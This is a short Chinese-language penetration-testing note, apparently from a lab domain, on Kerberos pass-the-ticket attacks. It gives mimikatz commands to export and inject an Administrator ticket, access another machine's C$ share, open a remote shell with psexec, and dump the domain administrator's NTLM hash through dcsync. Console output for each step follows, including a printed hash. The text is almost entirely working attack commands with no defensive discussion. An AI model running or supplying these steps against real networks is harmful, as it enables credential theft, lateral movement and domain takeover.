缓存票据

可在非域机器上使用,访问必须用ComputerName.domain.local的形式去访问。

  1. '域机器上导出可用票据,拷贝到本地
  2. mimikatz privilege::debug "sekurlsa::tickets /export" exit
  3. '在攻击者机器上导入高权限票据
  4. mimikatz privilege::debug "kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi" exit
  5. '使用票据访问其他域机器,还可以使用mimikatz直接同步导出指定用户的hash
  6. dir \\域机器名.域名\c$
  7. psexec \\域机器名.域名 cmd
  8. mimikatz "lsadump::dcsync /domain:tt.com /user:administrator" exit
  1. C:\Users\jack\Desktop>mimikatz privilege::debug "kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi" exit
  2. mimikatz(commandline) # privilege::debug
  3. ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
  4. mimikatz(commandline) # kerberos::ptt C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi
  5. * File: 'C:\Users\jack\Desktop\Administrator@krbtgt-TT.COM.kirbi': OK
  6. mimikatz(commandline) # exit
  7. Bye!
  1. C:\Users\jack\Desktop>dir \\WIN-J341S97EGGH.tt.com\c$
  2. 驱动器 \\WIN-J341S97EGGH.tt.com\c$ 中的卷没有标签。
  3. 卷的序列号是 7E13-549E
  4. \\WIN-J341S97EGGH.tt.com\c$ 的目录
  5. 2009/07/14 11:20 <DIR> PerfLogs
  6. 2020/08/28 21:24 <DIR> Program Files
  7. 2020/08/28 21:24 <DIR> Program Files (x86)
  8. 2020/08/28 21:54 <DIR> Users
  9. 2020/08/29 16:14 <DIR> Windows
  10. 0 个文件 0 字节
  11. 5 个目录 30,553,546,752 可用字节
  1. C:\Users\jack\Desktop>mimikatz "lsadump::dcsync /domain:tt.com /user:administrator" exit
  2. mimikatz(commandline) # lsadump::dcsync /domain:tt.com /user:administrator
  3. [DC] 'tt.com' will be the domain
  4. [DC] 'WIN-J341S97EGGH.tt.com' will be the DC server
  5. [DC] 'administrator' will be the user account
  6. Object RDN : Administrator
  7. ** SAM ACCOUNT **
  8. SAM Username : Administrator
  9. Account Type : 30000000 ( USER_OBJECT )
  10. User Account Control : 00000200 ( NORMAL_ACCOUNT )
  11. Account expiration : 1601/1/1 8:00:00
  12. Password last change : 2020/8/28 21:26:05
  13. Object Security ID : S-1-5-21-1881962959-1052950955-462027270-500
  14. Object Relative ID : 500
  15. Credentials:
  16. Hash NTLM: 30a96699356033b84283b8918a895d67